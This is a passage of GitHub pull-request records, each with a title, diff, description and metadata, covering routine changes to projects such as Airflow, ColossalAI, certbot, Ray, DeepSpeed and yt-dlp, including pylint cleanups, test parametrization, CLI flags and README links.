* [FACTORIE](https://github.com/factorie/factorie) - FACTORIE is a toolkit for deployable probabilistic modeling, implemented as a software library in Scala. It provides its users with a succinct language for creating relational factor graphs, estimating parameters and performing inference.
* [Montague](https://github.com/Workday/upshot-montague) - Montague is a semantic parsing library for Scala with an easy-to-use DSL.
+* [Spark NLP](https://github.com/JohnSnowLabs/spark-nlp) - Natural language processing library built on top of Apache Spark ML to provide simple, performant, and accurate NLP annotations for machine learning pipelines, that scale easily in a distributed environment.
<a name="scala-data-analysis"></a>
#### Data Analysis / Data Visualization
| Spark NLP natively supports Apache Spark and sits on top of the Spark ML Pipeline. It comes with pre-trained models and the ability to train your own models by using machine learning and deep learning algorithms.
Spark NLP fully supports both Java/Scala and Python APIs. | https://api.github.com/repos/josephmisiti/awesome-machine-learning/pulls/589 | 2019-02-12T10:58:38Z | 2019-02-14T14:19:40Z | 2019-02-14T14:19:40Z | 2019-02-14T14:44:00Z | 255 | josephmisiti/awesome-machine-learning | 51,764 |
E.15 Clarify when a rethrow would slice to `std::exception` | diff --git a/CppCoreGuidelines.md b/CppCoreGuidelines.md
index 183e2497c..fe7622246 100644
--- a/CppCoreGuidelines.md
+++ b/CppCoreGuidelines.md
@@ -16093,7 +16093,7 @@ Catch by value can be appropriate for a small value type such as an `enum` value
##### Note
-To rethrow a caught exception use `throw;` not `throw e;`. Using `throw e;` would throw a new copy of `e` (sliced to the static type `std::exception`) instead of rethrowing the original exception of type `std::runtime_error`. (But keep [Don't try to catch every exception in every function](#Re-not-always) and [Minimize the use of explicit `try`/`catch`](#Re-catch) in mind.)
+To rethrow a caught exception use `throw;` not `throw e;`. Using `throw e;` would throw a new copy of `e` (sliced to the static type `std::exception`, when the exception is caught by `catch (const std::exception& e)`) instead of rethrowing the original exception of type `std::runtime_error`. (But keep [Don't try to catch every exception in every function](#Re-not-always) and [Minimize the use of explicit `try`/`catch`](#Re-catch) in mind.)
##### Enforcement
| Avoided a potential misunderstanding that `throw e` would slice *any* `e` to `std::exception`.
The note about rethrowing appears to be written when the example of this item still did `catch (const exception& e)`, which was prior to commit d568d190f65a2cd9d3a3fde74cddbc5b5489bd99, "Generalized E.15, closes #1848". | https://api.github.com/repos/isocpp/CppCoreGuidelines/pulls/1949 | 2022-07-28T11:12:38Z | 2022-08-08T16:09:42Z | 2022-08-08T16:09:42Z | 2022-08-08T16:09:55Z | 317 | isocpp/CppCoreGuidelines | 16,008 |
add press release link | diff --git a/README.md b/README.md
index 371cdbfba783..5174c5140313 100755
--- a/README.md
+++ b/README.md
@@ -33,6 +33,7 @@ information [here](https://innovation.microsoft.com/en-us/exploring-ai-at-scale)
# News
+* [2021/05/24] [DeepSpeed: Accelerating large-scale model inference and training via system optimizations and compression](https://www.microsoft.com/en-us/research/blog/deepspeed-accelerating-large-scale-model-inference-and-training-via-system-optimizations-and-compression/)
* [2021/04/20] [1-bit LAMB: up to 4.6x less communication and 2.8x faster training, together with LAMB's convergence speed at large batch sizes](https://www.deepspeed.ai/tutorials/onebit-lamb/)
* [2021/04/19] [ZeRO-Infinity unlocks unprecedented model scale for deep learning training](https://www.microsoft.com/en-us/research/blog/zero-infinity-and-deepspeed-unlocking-unprecedented-model-scale-for-deep-learning-training/)
* [Tutorial on how to use different stages of ZeRO](https://www.deepspeed.ai/tutorials/zero/)
diff --git a/docs/index.md b/docs/index.md
index 9d60ed6e1298..cdb692ab6572 100755
--- a/docs/index.md
+++ b/docs/index.md
@@ -30,6 +30,7 @@ initiative to enable next-generation AI capabilities at scale, where you can fin
information [here](https://innovation.microsoft.com/en-us/exploring-ai-at-scale).
# What's New?
+* [2021/05/24] [DeepSpeed: Accelerating large-scale model inference and training via system optimizations and compression](https://www.microsoft.com/en-us/research/blog/deepspeed-accelerating-large-scale-model-inference-and-training-via-system-optimizations-and-compression/)
* [2021/04/20] [1-bit LAMB: up to 4.6x less communication and 2.8x faster training, together with LAMB's convergence speed at large batch sizes](https://www.deepspeed.ai/tutorials/onebit-lamb/)
* [2021/04/19] [ZeRO-Infinity unlocks unprecedented model scale for deep learning training](https://www.microsoft.com/en-us/research/blog/zero-infinity-and-deepspeed-unlocking-unprecedented-model-scale-for-deep-learning-training/)
* [Tutorial on how to use different stages of ZeRO](https://www.deepspeed.ai/tutorials/zero/)
| https://api.github.com/repos/microsoft/DeepSpeed/pulls/1094 | 2021-05-24T17:57:41Z | 2021-05-24T17:58:05Z | 2021-05-24T17:58:04Z | 2021-05-24T17:58:08Z | 574 | microsoft/DeepSpeed | 10,050 | |
[test] pytest parametrize | diff --git a/tests/test_zero_data_parallel/test_init_context.py b/tests/test_zero_data_parallel/test_init_context.py
index cf038844c1d2..938aad6018b3 100644
--- a/tests/test_zero_data_parallel/test_init_context.py
+++ b/tests/test_zero_data_parallel/test_init_context.py
@@ -28,11 +28,11 @@ def run_dist(rank, world_size, port):
@pytest.mark.dist
-def test_zero_init_context():
- world_size = 2
+@pytest.mark.parametrize("world_size", [1, 2, 4])
+def test_zero_init_context(world_size):
run_func = partial(run_dist, world_size=world_size, port=free_port())
mp.spawn(run_func, nprocs=world_size)
if __name__ == '__main__':
- test_zero_init_context()
+ test_zero_init_context(2)
diff --git a/tests/test_zero_data_parallel/test_shard_model_v2.py b/tests/test_zero_data_parallel/test_shard_model_v2.py
index 175abac10c3e..56af46e67ed6 100644
--- a/tests/test_zero_data_parallel/test_shard_model_v2.py
+++ b/tests/test_zero_data_parallel/test_shard_model_v2.py
@@ -30,12 +30,7 @@ def run_fwd_bwd(model, x, enable_autocast=False):
def run_dist(rank, world_size, port):
- colossalai.launch(config=CONFIG,
- rank=rank,
- world_size=world_size,
- host='localhost',
- port=port,
- backend='nccl')
+ colossalai.launch(config=CONFIG, rank=rank, world_size=world_size, host='localhost', port=port, backend='nccl')
model = Net(checkpoint=True).cuda()
zero_model = copy.deepcopy(model)
@@ -52,11 +47,11 @@ def run_dist(rank, world_size, port):
@pytest.mark.dist
-def test_shard_model_v2():
- world_size = 2
+@pytest.mark.parametrize("world_size", [1, 2, 4])
+def test_shard_model_v2(world_size):
run_func = partial(run_dist, world_size=world_size, port=free_port())
mp.spawn(run_func, nprocs=world_size)
if __name__ == '__main__':
- test_shard_model_v2()
+ test_shard_model_v2(world_size=2)
diff --git a/tests/test_zero_data_parallel/test_shard_param.py b/tests/test_zero_data_parallel/test_shard_param.py
index 640292f31967..e324c30148be 100644
--- a/tests/test_zero_data_parallel/test_shard_param.py
+++ b/tests/test_zero_data_parallel/test_shard_param.py
@@ -4,19 +4,21 @@
from copy import deepcopy
from functools import partial
-import colossalai
-from colossalai.zero.sharded_param.sharded_param import ShardedParamV2
import pytest
import torch
import torch.multiprocessing as mp
+
+import colossalai
+from colossalai.zero.sharded_param.sharded_param import ShardedParamV2
from colossalai.zero.shard_utils import TensorShardStrategy
from colossalai.zero.sharded_param import ShardedTensor, ShardedParam
from colossalai.utils import free_port
from colossalai.logging import get_dist_logger, disable_existing_loggers
+
from tests.test_zero_data_parallel.common import Net, CONFIG, allclose
-def run_shard_tensor(rank, world_size, port):
+def _run_shard_tensor(rank, world_size, port):
colossalai.launch(config=CONFIG, rank=rank, world_size=world_size, host='localhost', port=port, backend='nccl')
t = ShardedTensor(tensor=torch.randn(world_size * 2, 3))
assert list(t.origin_shape) == [world_size * 2, 3]
@@ -32,9 +34,9 @@ def run_shard_tensor(rank, world_size, port):
@pytest.mark.dist
-def test_shard_tensor():
- world_size = 2
- run_func = partial(run_shard_tensor, world_size=world_size, port=free_port())
+@pytest.mark.parametrize("world_size", [1, 2])
+def test_shard_tensor(world_size):
+ run_func = partial(_run_shard_tensor, world_size=world_size, port=free_port())
mp.spawn(run_func, nprocs=world_size)
@@ -50,8 +52,8 @@ def _run_shard_param_v2(rank, world_size, port):
@pytest.mark.dist
-def test_shard_param_v2():
- world_size = 2
+@pytest.mark.parametrize("world_size", [1, 2])
+def test_shard_param_v2(world_size):
run_func = partial(_run_shard_param_v2, world_size=world_size, port=free_port())
mp.spawn(run_func, nprocs=world_size)
@@ -84,40 +86,40 @@ def _run_test_shard_param(rank, world_size, port):
@pytest.mark.dist
-def test_shard_param():
- world_size = 2
+@pytest.mark.parametrize("world_size", [1, 2])
+def test_shard_param(world_size):
run_func = partial(_run_test_shard_param, world_size=world_size, port=free_port())
mp.spawn(run_func, nprocs=world_size)
-def run_init_shard_param(rank, world_size, port):
+def _run_init_shard_param(rank, world_size, port):
colossalai.launch(config=CONFIG, rank=rank, world_size=world_size, host='localhost', port=port, backend='nccl')
- param = torch.nn.Parameter(data=torch.rand(2, 3))
+ param = torch.nn.Parameter(data=torch.rand(world_size, 3))
sparam = ShardedParam(param, None, True)
payload = sparam.payload(torch.device('cuda'))
assert (list(payload.shape) == [3])
del sparam
- param_shape = (2, 3)
+ param_shape = (world_size, 3)
sparam = ShardedParam(param_shape, process_group=None, is_sharded=True, device=torch.device('cpu'))
payload = sparam.payload(torch.device('cuda'))
assert (list(payload.shape) == [3])
- param_shape = (2, 3)
+ param_shape = (world_size, 3)
sparam = ShardedParam(param_shape, process_group=None, is_sharded=False, device=torch.device('cpu'))
payload = sparam.payload(torch.device('cuda'))
- assert (list(payload.shape) == [2, 3])
+ assert (list(payload.shape) == [world_size, 3])
@pytest.mark.dist
-def test_init_shard_param():
- world_size = 2
- run_func = partial(run_init_shard_param, world_size=world_size, port=free_port())
+@pytest.mark.parametrize("world_size", [1, 4])
+def test_init_shard_param(world_size):
+ run_func = partial(_run_init_shard_param, world_size=world_size, port=free_port())
mp.spawn(run_func, nprocs=world_size)
if __name__ == '__main__':
- test_shard_tensor()
- test_shard_param()
- test_shard_param_v2()
- test_init_shard_param()
+ test_shard_tensor(2)
+ test_shard_param(2)
+ test_shard_param_v2(2)
+ test_init_shard_param(4)
diff --git a/tests/test_zero_data_parallel/test_zero_param_mgr.py b/tests/test_zero_data_parallel/test_zero_param_mgr.py
index a38ed92863b4..8171a0946c89 100644
--- a/tests/test_zero_data_parallel/test_zero_param_mgr.py
+++ b/tests/test_zero_data_parallel/test_zero_param_mgr.py
@@ -1,41 +1,39 @@
#!/usr/bin/env python
# -*- encoding: utf-8 -*-
-import os
from functools import partial
-from pathlib import Path
-
-import colossalai
import pytest
+
import torch
import torch.multiprocessing as mp
+
+import colossalai
from colossalai.zero.sharded_model.param_manager import Zero3ParameterManager
from colossalai.core import global_context as gpc
from colossalai.context.parallel_mode import ParallelMode
from colossalai.utils import free_port
from common import CONFIG
+
def run_shard_shape_check(rank, world_size, port):
- colossalai.launch(config=CONFIG,
- rank=rank,
- world_size=world_size,
- host='localhost',
- port=port,
- backend='nccl')
-
+ colossalai.launch(config=CONFIG, rank=rank, world_size=world_size, host='localhost', port=port, backend='nccl')
+
model = torch.nn.Linear(2, 4 * world_size)
gpc.init_parallel_groups()
- Zero3ParameterManager(module=model, process_group=gpc.get_group(ParallelMode.DATA), offload_config=CONFIG.get('offload_param_config'))
+ Zero3ParameterManager(module=model,
+ process_group=gpc.get_group(ParallelMode.DATA),
+ offload_config=CONFIG.get('offload_param_config'))
- assert(model.weight.numel() == 4 * 2)
- assert(model.bias.numel() == 4)
+ assert (model.weight.numel() == 4 * 2)
+ assert (model.bias.numel() == 4)
@pytest.mark.dist
-def test_run_shard_shape():
- world_size = 2
+@pytest.mark.parametrize("world_size", [1, 2, 4])
+def test_run_shard_shape(world_size):
run_func = partial(run_shard_shape_check, world_size=world_size, port=free_port())
mp.spawn(run_func, nprocs=world_size)
+
if __name__ == '__main__':
- test_run_shard_shape()
+ test_run_shard_shape(2)
| https://api.github.com/repos/hpcaitech/ColossalAI/pulls/328 | 2022-03-08T03:52:13Z | 2022-03-08T07:10:22Z | 2022-03-08T07:10:21Z | 2022-03-08T07:10:22Z | 2,193 | hpcaitech/ColossalAI | 11,076 | |
[Airflow-4668] Make airflow/contrib/utils Pylint compatible | diff --git a/airflow/contrib/utils/log/task_handler_with_custom_formatter.py b/airflow/contrib/utils/log/task_handler_with_custom_formatter.py
index 3fd690ccd8f46..83a2c6b619428 100644
--- a/airflow/contrib/utils/log/task_handler_with_custom_formatter.py
+++ b/airflow/contrib/utils/log/task_handler_with_custom_formatter.py
@@ -16,6 +16,9 @@
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
+"""
+Custom logging formatter for Airflow
+"""
import logging
@@ -25,10 +28,20 @@
class TaskHandlerWithCustomFormatter(StreamHandler):
+ """
+ Custom implementation of StreamHandler, a class which writes logging records for Airflow
+ """
def __init__(self, stream):
super().__init__()
+ self.prefix_jinja_template = None
def set_context(self, ti):
+ """
+ Accept the run-time context (i.e. the current task) and configure the formatter accordingly.
+
+ :param ti:
+ :return:
+ """
if ti.raw:
return
prefix = conf.get('core', 'task_log_prefix_template')
@@ -37,8 +50,8 @@ def set_context(self, ti):
if prefix:
_, self.prefix_jinja_template = parse_template_string(prefix)
rendered_prefix = self._render_prefix(ti)
-
- self.setFormatter(logging.Formatter(rendered_prefix + ":" + self.formatter._fmt))
+ formatter = logging.Formatter(rendered_prefix + ":" + self.formatter._fmt) # pylint:disable=W0212
+ self.setFormatter(formatter)
self.setLevel(self.level)
def _render_prefix(self, ti):
diff --git a/airflow/contrib/utils/sendgrid.py b/airflow/contrib/utils/sendgrid.py
index dfca195b56e25..243b46f47f465 100644
--- a/airflow/contrib/utils/sendgrid.py
+++ b/airflow/contrib/utils/sendgrid.py
@@ -16,6 +16,9 @@
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
+"""
+Airflow module for emailer using sendgrid
+"""
import base64
import mimetypes
@@ -30,8 +33,8 @@
from airflow.utils.log.logging_mixin import LoggingMixin
-def send_email(to, subject, html_content, files=None, dryrun=False, cc=None,
- bcc=None, mime_subtype='mixed', sandbox_mode=False, **kwargs):
+def send_email(to, subject, html_content, files=None, cc=None,
+ bcc=None, sandbox_mode=False, **kwargs):
"""
Send an email with html content using sendgrid.
@@ -104,8 +107,8 @@ def send_email(to, subject, html_content, files=None, dryrun=False, cc=None,
def _post_sendgrid_mail(mail_data):
log = LoggingMixin().log
- sg = sendgrid.SendGridAPIClient(apikey=os.environ.get('SENDGRID_API_KEY'))
- response = sg.client.mail.send.post(request_body=mail_data)
+ sendgrid_client = sendgrid.SendGridAPIClient(apikey=os.environ.get('SENDGRID_API_KEY'))
+ response = sendgrid_client.client.mail.send.post(request_body=mail_data)
# 2xx status code.
if 200 <= response.status_code < 300:
log.info('Email with subject %s is successfully sent to recipients: %s',
diff --git a/airflow/contrib/utils/weekday.py b/airflow/contrib/utils/weekday.py
index 8630e5a3dca7c..10bac42f5c2dd 100644
--- a/airflow/contrib/utils/weekday.py
+++ b/airflow/contrib/utils/weekday.py
@@ -16,6 +16,9 @@
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
+"""
+Get the ISO standard day number of the week from a given day string
+"""
import enum
diff --git a/scripts/ci/pylint_todo.txt b/scripts/ci/pylint_todo.txt
index 34b7c4b6f0504..55afbe991d6c9 100644
--- a/scripts/ci/pylint_todo.txt
+++ b/scripts/ci/pylint_todo.txt
@@ -130,9 +130,8 @@
./airflow/contrib/sensors/sftp_sensor.py
./airflow/contrib/sensors/wasb_sensor.py
./airflow/contrib/sensors/weekday_sensor.py
-./airflow/contrib/utils/log/task_handler_with_custom_formatter.py
-./airflow/contrib/utils/sendgrid.py
-./airflow/contrib/utils/weekday.py
+./airflow/gcp/utils/mlengine_operator_utils.py
+./airflow/gcp/utils/mlengine_prediction_summary.
./airflow/exceptions.py
./airflow/executors/base_executor.py
./airflow/executors/celery_executor.py
diff --git a/tests/contrib/utils/logging_command_executor.py b/tests/contrib/utils/logging_command_executor.py
index 9c5678cea9580..d79da868b16a4 100644
--- a/tests/contrib/utils/logging_command_executor.py
+++ b/tests/contrib/utils/logging_command_executor.py
@@ -27,8 +27,8 @@ class LoggingCommandExecutor(LoggingMixin):
def execute_cmd(self, cmd, silent=False, cwd=None):
if silent:
self.log.info("Executing in silent mode: '{}'".format(" ".join(cmd)))
- with open(os.devnull, 'w') as FNULL:
- return subprocess.call(args=cmd, stdout=FNULL, stderr=subprocess.STDOUT)
+ with open(os.devnull, 'w') as dev_null:
+ return subprocess.call(args=cmd, stdout=dev_null, stderr=subprocess.STDOUT)
else:
self.log.info("Executing: '{}'".format(" ".join(cmd)))
process = subprocess.Popen(
diff --git a/tests/contrib/utils/run_once_decorator.py b/tests/contrib/utils/run_once_decorator.py
index 934250ec2ffa7..89120446f9270 100644
--- a/tests/contrib/utils/run_once_decorator.py
+++ b/tests/contrib/utils/run_once_decorator.py
@@ -31,5 +31,6 @@ def wrapper(*args, **kwargs):
result = f(*args, **kwargs)
wrapper.has_run = True
return result
+ return None
wrapper.has_run = False
return wrapper
diff --git a/tests/contrib/utils/test_sendgrid.py b/tests/contrib/utils/test_sendgrid.py
index cb92d654baf34..3561548341e11 100644
--- a/tests/contrib/utils/test_sendgrid.py
+++ b/tests/contrib/utils/test_sendgrid.py
@@ -30,10 +30,10 @@
class TestSendEmailSendGrid(unittest.TestCase):
# Unit test for sendgrid.send_email()
def setUp(self):
- self.to = ['foo@foo.com', 'bar@bar.com']
+ self.recepients = ['foo@foo.com', 'bar@bar.com']
self.subject = 'sendgrid-send-email unit test'
self.html_content = '<b>Foo</b> bar'
- self.cc = ['foo-cc@foo.com', 'bar-cc@bar.com']
+ self.carbon_copy = ['foo-cc@foo.com', 'bar-cc@bar.com']
self.bcc = ['foo-bcc@foo.com', 'bar-bcc@bar.com']
self.expected_mail_data = {
'content': [{'type': 'text/html', 'value': self.html_content}],
@@ -83,10 +83,10 @@ def test_send_email_sendgrid_correct_email(self, mock_post):
}],
)
- send_email(self.to,
+ send_email(self.recepients,
self.subject,
self.html_content,
- cc=self.cc,
+ cc=self.carbon_copy,
bcc=self.bcc,
files=[f.name])
mock_post.assert_called_once_with(expected_mail_data)
@@ -100,7 +100,7 @@ def test_send_email_sendgrid_correct_email(self, mock_post):
)
@mock.patch('airflow.contrib.utils.sendgrid._post_sendgrid_mail')
def test_send_email_sendgrid_correct_email_extras(self, mock_post):
- send_email(self.to, self.subject, self.html_content, cc=self.cc, bcc=self.bcc,
+ send_email(self.recepients, self.subject, self.html_content, cc=self.carbon_copy, bcc=self.bcc,
personalization_custom_args=self.personalization_custom_args,
categories=self.categories)
mock_post.assert_called_once_with(self.expected_mail_data_extras)
@@ -108,6 +108,6 @@ def test_send_email_sendgrid_correct_email_extras(self, mock_post):
@mock.patch('os.environ', {})
@mock.patch('airflow.contrib.utils.sendgrid._post_sendgrid_mail')
def test_send_email_sendgrid_sender(self, mock_post):
- send_email(self.to, self.subject, self.html_content, cc=self.cc, bcc=self.bcc,
+ send_email(self.recepients, self.subject, self.html_content, cc=self.carbon_copy, bcc=self.bcc,
from_email='foo@foo.bar', from_name='Foo Bar')
mock_post.assert_called_once_with(self.expected_mail_data_sender)
diff --git a/tests/contrib/utils/test_weekday.py b/tests/contrib/utils/test_weekday.py
index 3b4384344cb2c..906eec52005ed 100644
--- a/tests/contrib/utils/test_weekday.py
+++ b/tests/contrib/utils/test_weekday.py
@@ -31,12 +31,12 @@ def test_weekday_name_value(self):
weekdays = "MONDAY TUESDAY WEDNESDAY THURSDAY FRIDAY SATURDAY SUNDAY"
weekdays = weekdays.split()
for i, weekday in enumerate(weekdays, start=1):
- e = WeekDay(i)
- self.assertEqual(e, i)
- self.assertEqual(int(e), i)
- self.assertEqual(e.name, weekday)
- self.assertTrue(e in WeekDay)
- self.assertTrue(0 < e < 8)
- self.assertTrue(type(e) is WeekDay)
- self.assertTrue(isinstance(e, int))
- self.assertTrue(isinstance(e, Enum))
+ weekday_enum = WeekDay(i)
+ self.assertEqual(weekday_enum, i)
+ self.assertEqual(int(weekday_enum), i)
+ self.assertEqual(weekday_enum.name, weekday)
+ self.assertTrue(weekday_enum in WeekDay)
+ self.assertTrue(0 < weekday_enum < 8)
+ self.assertIsInstance(weekday_enum, WeekDay)
+ self.assertIsInstance(weekday_enum, int)
+ self.assertIsInstance(weekday_enum, Enum)
| Make sure you have checked _all_ steps below.
### Jira
- [x] My PR addresses the following [Airflow Jira](https://issues.apache.org/jira/browse/AIRFLOW/) issues and references them in the PR title. For example, "\[AIRFLOW-XXX\] My Airflow PR"
- https://issues.apache.org/jira/browse/AIRFLOW-4668
- In case you are fixing a typo in the documentation you can prepend your commit with \[AIRFLOW-XXX\], code changes always need a Jira issue.
- In case you are proposing a fundamental code change, you need to create an Airflow Improvement Proposal ([AIP](https://cwiki.apache.org/confluence/display/AIRFLOW/Airflow+Improvements+Proposals)).
- In case you are adding a dependency, check if the license complies with the [ASF 3rd Party License Policy](https://www.apache.org/legal/resolved.html#category-x).
### Description
- [x] Here are some details about my PR, including screenshots of any UI changes:
Makes airflow/contrib/utils pylint compatible
### Tests
- [x] My PR adds the following unit tests __OR__ does not need testing for this extremely good reason:
No change in code
### Commits
- [x] My commits all reference Jira issues in their subject lines, and I have squashed multiple commits if they address the same issue. In addition, my commits follow the guidelines from "[How to write a good git commit message](http://chris.beams.io/posts/git-commit/)":
1. Subject is separated from body by a blank line
1. Subject is limited to 50 characters (not including Jira issue reference)
1. Subject does not end with a period
1. Subject uses the imperative mood ("add", not "adding")
1. Body wraps at 72 characters
1. Body explains "what" and "why", not "how"
### Documentation
- [x] In case of new functionality, my PR adds documentation that describes how to use it.
- All the public functions and the classes in the PR contain docstrings that explain what it does
- If you implement backwards incompatible changes, please leave a note in the [Updating.md](https://github.com/apache/airflow/blob/master/UPDATING.md) so we can assign it to a appropriate release
### Code Quality
- [x] Passes `flake8`
| https://api.github.com/repos/apache/airflow/pulls/5916 | 2019-08-26T14:29:27Z | 2019-09-04T08:23:58Z | 2019-09-04T08:23:58Z | 2019-09-04T08:23:58Z | 2,393 | apache/airflow | 14,667 |
[Test][Tiny]Check argv in right way in mock worker | diff --git a/src/ray/core_worker/test/mock_worker.cc b/src/ray/core_worker/test/mock_worker.cc
index 03a78a1981a7b..2d650e5d697ef 100644
--- a/src/ray/core_worker/test/mock_worker.cc
+++ b/src/ray/core_worker/test/mock_worker.cc
@@ -145,7 +145,7 @@ class MockWorker {
} // namespace ray
int main(int argc, char **argv) {
- RAY_CHECK(argc == 4);
+ RAY_CHECK(argc >= 4);
auto store_socket = std::string(argv[1]);
auto raylet_socket = std::string(argv[2]);
auto node_manager_port = std::stoi(std::string(argv[3]));
| <!-- Thank you for your contribution! Please review https://github.com/ray-project/ray/blob/master/CONTRIBUTING.rst before opening a pull request. -->
<!-- Please add a reviewer to the assignee section when you create a PR. If you don't have the access to it, we will shortly find a reviewer and assign them to your PR. -->
## Why are these changes needed?
This test is broke by introducing `--runtime-env-hash=` in 194c5e3a96126ddabca48bf25de395d9684c3583.
P.S.
For some reason I don't know `core_worker_test` is disabled in CI.
But I think it would be better to keep this part being ok as long as possible.
<!-- Please give a short summary of the change and the problem this solves. -->
## Related issue number
<!-- For example: "Closes #1234" -->
## Checks
- [x] I've run `scripts/format.sh` to lint the changes in this PR.
- [x] I've included any doc changes needed for https://docs.ray.io/en/master/.
- [x] I've made sure the tests are passing. Note that there might be a few flaky tests, see the recent failures at https://flakey-tests.ray.io/
- Testing Strategy
- [x] Unit tests
- [ ] Release tests
- [ ] This PR is not tested :(
| https://api.github.com/repos/ray-project/ray/pulls/16325 | 2021-06-09T02:16:14Z | 2021-06-09T05:18:27Z | 2021-06-09T05:18:27Z | 2021-06-09T05:18:31Z | 164 | ray-project/ray | 18,948 |
Add finish_release.py CLI parsing and flags | diff --git a/tools/finish_release.py b/tools/finish_release.py
index bc8e832dfb7..24e20987fa9 100755
--- a/tools/finish_release.py
+++ b/tools/finish_release.py
@@ -21,6 +21,7 @@
python tools/finish_release.py ~/.ssh/githubpat.txt
"""
+import argparse
import glob
import os.path
import re
@@ -44,6 +45,34 @@
# for sanity checking.
SNAP_ARCH_COUNT = 3
+
+def parse_args(args):
+ """Parse command line arguments.
+
+ :param args: command line arguments with the program name removed. This is
+ usually taken from sys.argv[1:].
+ :type args: `list` of `str`
+
+ :returns: parsed arguments
+ :rtype: argparse.Namespace
+
+ """
+ # Use the file's docstring for the help text and don't let argparse reformat it.
+ parser = argparse.ArgumentParser(description=__doc__,
+ formatter_class=argparse.RawDescriptionHelpFormatter)
+ parser.add_argument('githubpat', help='path to your GitHub personal access token')
+ group = parser.add_mutually_exclusive_group()
+ # We use 'store_false' and a destination related to the other type of
+ # artifact to cause the flag being set to disable publishing of the other
+ # artifact. This makes using the parsed arguments later on a little simpler
+ # and cleaner.
+ group.add_argument('--snaps-only', action='store_false', dest='publish_windows',
+ help='Skip publishing other artifacts and only publish the snaps')
+ group.add_argument('--windows-only', action='store_false', dest='publish_snaps',
+ help='Skip publishing other artifacts and only publish the Windows installer')
+ return parser.parse_args(args)
+
+
def download_azure_artifacts(tempdir):
"""Download and unzip build artifacts from Azure pipelines.
@@ -181,8 +210,9 @@ def promote_snaps(version):
def main(args):
- github_access_token_file = args[0]
+ parsed_args = parse_args(args)
+ github_access_token_file = parsed_args.githubpat
github_access_token = open(github_access_token_file, 'r').read().rstrip()
with tempfile.TemporaryDirectory() as tempdir:
@@ -191,8 +221,10 @@ def main(args):
# again fails. Publishing the snaps can be done multiple times though
# so we do that first to make it easier to run the script again later
# if something goes wrong.
- promote_snaps(version)
- create_github_release(github_access_token, tempdir, version)
+ if parsed_args.publish_snaps:
+ promote_snaps(version)
+ if parsed_args.publish_windows:
+ create_github_release(github_access_token, tempdir, version)
if __name__ == "__main__":
main(sys.argv[1:])
| We were recently notified that https://ubuntu.com/security/notices/USN-4662-1 is affecting our snaps. I'm rebuilding them, but once that's done, I need to publish them by running `tools/finish_release.py`. I don't want to republish the Windows installer though. I could modify the code, but I think some command line options for this is nicer.
I tested that the four combinations of the `--*-only` flags works as expected and the `--help` output looks like:
```
usage: finish_release.py [-h] [--snaps-only | --windows-only] githubpat
Post-release script to publish artifacts created from Azure Pipelines.
This currently includes:
* Moving snaps from the beta channel to the stable channel
* Publishing the Windows installer in a GitHub release
Setup:
- Create a github personal access token
- https://docs.github.com/en/github/authenticating-to-github/creating-a-personal-access-token#creating-a-token
- You'll need repo scope
- Save the token to somewhere like ~/.ssh/githubpat.txt
- Install the snapcraft command line tool and log in to a privileged account.
- https://snapcraft.io/docs/installing-snapcraft
- Use the command `snapcraft login` to log in.
Run:
python tools/finish_release.py ~/.ssh/githubpat.txt
positional arguments:
githubpat path to your GitHub personal access token
optional arguments:
-h, --help show this help message and exit
--snaps-only Skip publishing other artifacts and only publish the snaps
--windows-only Skip publishing other artifacts and only publish the Windows installer
```
@ohemorange, since you and are the ones using this script, I think it makes the most sense for you to review it when you get a chance. | https://api.github.com/repos/certbot/certbot/pulls/8522 | 2020-12-09T18:51:28Z | 2020-12-10T23:13:48Z | 2020-12-10T23:13:48Z | 2020-12-10T23:13:49Z | 643 | certbot/certbot | 1,572 |
[extractor/glomex] Minor fixes | diff --git a/yt_dlp/extractor/generic.py b/yt_dlp/extractor/generic.py
index 529edb59867..7198aa02cc1 100644
--- a/yt_dlp/extractor/generic.py
+++ b/yt_dlp/extractor/generic.py
@@ -1874,6 +1874,7 @@ class GenericIE(InfoExtractor):
'add_ie': [RutubeIE.ie_key()],
},
{
+ # glomex:embed
'url': 'https://www.skai.gr/news/world/iatrikos-syllogos-tourkias-to-turkovac-aplo-dialyma-erntogan-eiste-apateones-kai-pseytes',
'info_dict': {
'id': 'v-ch2nkhcirwc9-sf',
diff --git a/yt_dlp/extractor/glomex.py b/yt_dlp/extractor/glomex.py
index 247a65a7962..ec3c35c6f5a 100644
--- a/yt_dlp/extractor/glomex.py
+++ b/yt_dlp/extractor/glomex.py
@@ -75,7 +75,7 @@ def _extract_api_data(self, video, video_id):
format_url, video_id, 'mp4', m3u8_id=format_id,
fatal=False)
formats.extend(formats_)
- subs.update(subs_)
+ self._merge_subtitles(subs_, target=subs)
else:
formats.append({
'url': format_url,
@@ -205,8 +205,6 @@ def _extract_urls(cls, webpage, origin_url):
mdict = mobj.groupdict()
if mdict.get('url'):
url = unescapeHTML(mdict['url'])
- if url.startswith('//'):
- url = f'https:{url}'
if not cls.suitable(url):
continue
yield cls._smuggle_origin_url(url, origin_url)
| ## Please follow the guide below
- You will be asked some questions, please read them **carefully** and answer honestly
- Put an `x` into all the boxes [ ] relevant to your *pull request* (like that [x])
- Use *Preview* tab to see how your *pull request* will actually look like
---
### Before submitting a *pull request* make sure you have:
- [x] At least skimmed through [contributing guidelines](https://github.com/yt-dlp/yt-dlp/blob/master/CONTRIBUTING.md#developer-instructions) including [yt-dlp coding conventions](https://github.com/yt-dlp/yt-dlp/blob/master/CONTRIBUTING.md#yt-dlp-coding-conventions)
- [x] [Searched](https://github.com/yt-dlp/yt-dlp/search?q=is%3Apr&type=Issues) the bugtracker for similar pull requests
- [x] Checked the code with [flake8](https://pypi.python.org/pypi/flake8)
### In order to be accepted and merged into yt-dlp each piece of code must be in public domain or released under [Unlicense](http://unlicense.org/). Check one of the following options:
- [x] I am the original author of this code and I am willing to release it under [Unlicense](http://unlicense.org/)
- [ ] I am not the original author of this code but it is in public domain or released under [Unlicense](http://unlicense.org/) (provide reliable evidence)
### What is the purpose of your *pull request*?
- [ ] Bug fix
- [x] Improvement
- [ ] New extractor
- [ ] New feature
---
### Description of your *pull request* and other information
* Use `_merge_subtitles`
* Do not resolve scheme for embedded URLs
* Add comment to test (in `GenericIE`) for `_extract_urls` | https://api.github.com/repos/yt-dlp/yt-dlp/pulls/2357 | 2022-01-16T12:13:23Z | 2022-01-16T12:38:31Z | 2022-01-16T12:38:31Z | 2022-01-16T20:22:25Z | 440 | yt-dlp/yt-dlp | 7,602 |
